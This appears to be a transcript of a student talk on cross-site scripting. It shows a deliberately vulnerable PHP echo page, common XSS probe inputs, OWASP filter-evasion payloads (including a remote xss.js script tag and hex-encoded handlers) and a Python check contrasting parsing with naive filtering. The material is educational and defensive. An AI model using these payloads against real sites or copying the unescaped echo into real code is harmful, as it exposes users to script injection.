XSSの入力値を調べてみた / searching xss insertion value
Tomoyuki KOYAMA
February 03, 2018
2018/02/03 Student LT at freee
Transcript
XSS
Self-introduction: B1, Twitter: @tmyk_kym, https://blog.koyama.me/, Network/Web/Server/Security, PyCon JP, Seccamp, etc.
XSS (Cross Site Scripting): CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (3.0)
A sample page (vulnerable on purpose: the query parameter is echoed into the HTML without escaping):

    <!doctype html>
    <meta charset="utf-8">
    <title>XSS Sample</title>
    <h1><?php echo $_GET['mode']; ?></h1>

With $_GET['mode'] = hello the generated page is:

    <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>

With $_GET['mode'] = <script>alert()</script> the script tag lands in the page unchanged:

    <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
Types of XSS: Stored XSS, Reflected XSS, DOM Based XSS
XSS == XSS
Typical test inputs:
    <script>alert(1)</script>
    "><script>alert(1)</script>
    " onmouseover="alert(1) x"
    onerror="alert(1)      <- inside img src
    javascript:alert(1)    <- inside a href
XSS
Reference: OWASP XSS Filter Evasion Cheat Sheet (2015, Japanese translation hosted by JPCERT/CC): https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
Three examples from the cheat sheet:
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
    The browser parses this as: <script xss="" src="http://example.com/xss.js"></script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT>
    Resulting HTML: "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> with hexadecimal HTML character references (&#x...) inserted at the gaps
    The browser decodes the references and sees: <img src="x" onerror="javascript:alert('XSS')">
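Added example (not from the slides): a small Python check that feeds payloads shaped like [1] to [3] through the standard-library html.parser, so the same parser-level view the browser gets ("/XSS" becomes an attribute, &#x..; references in attribute values are decoded) can be compared with a raw-substring filter. The exact hex references used in the constructed third sample are an assumption about the slide's elided "&#x...".

```python
from html.parser import HTMLParser

# Constructed inputs modelled on cheat-sheet examples [1] to [3]; the exact
# hex references in "hex_refs" are an assumption about the slide's "&#x...".
SAMPLES = {
    "slash_attr": '<SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>',
    "double_lt": '<<SCRIPT>alert("XSS");//<</SCRIPT>',
    "hex_refs": "<img src=x onerror=javas&#x63;ript:ale&#x72;t('XSS')>",
    "benign": '<p class="note">hello</p>',
}

SCRIPT_TAGS = {"script", "iframe", "object", "embed"}


class Findings(HTMLParser):
    """Record script-capable tags and on* handlers as the parser sees them."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # By the time we get here the tag name is lowercased, "/XSS" has become
        # an attribute, and &#x..; references in attribute values are decoded.
        if tag in SCRIPT_TAGS:
            self.hits.append(("tag", tag, dict(attrs).get("src")))
        for name, value in attrs:
            if name.startswith("on"):
                self.hits.append(("handler", name, value))


def inspect(fragment):
    """Return what an HTML parser would actually hand to the script engine."""
    parser = Findings()
    parser.feed(fragment)
    parser.close()
    return parser.hits


def naive_filter_catches(fragment):
    """Raw-substring check that examples [1] and [3] are built to slip past."""
    low = fragment.lower()
    return "<script>" in low or "javascript:" in low


if __name__ == "__main__":
    for name, fragment in SAMPLES.items():
        print(name, "naive:", naive_filter_catches(fragment), "parsed:", inspect(fragment))
```

Only the double-angle-bracket sample is caught by the substring check; the other two show up only once the input is parsed, which is why output encoding at the point of HTML generation, not input filtering, is the fix for the PHP sample above.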
Other cheat-sheet examples:
    <img src=javascript:alert('XSS')>
    <img src=javascript: alert(String.fromCharCode(88,83,83))>
    <META HTTP-EQUIV="refresh" CONTENT="3; URL=http://;URL=http://yahoo.co.jp/;">
Electron / Marp: Marp is built on Electron (web technology) ... entering <script>alert()</script> into a slide ... alert() ...
JVN#21174546 (Marp, JavaScript): https://jvn.jp/jp/JVN21174546/
"However, sanitizing inline script should consider on future." (from: [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp)
XSS XSS alert() Electron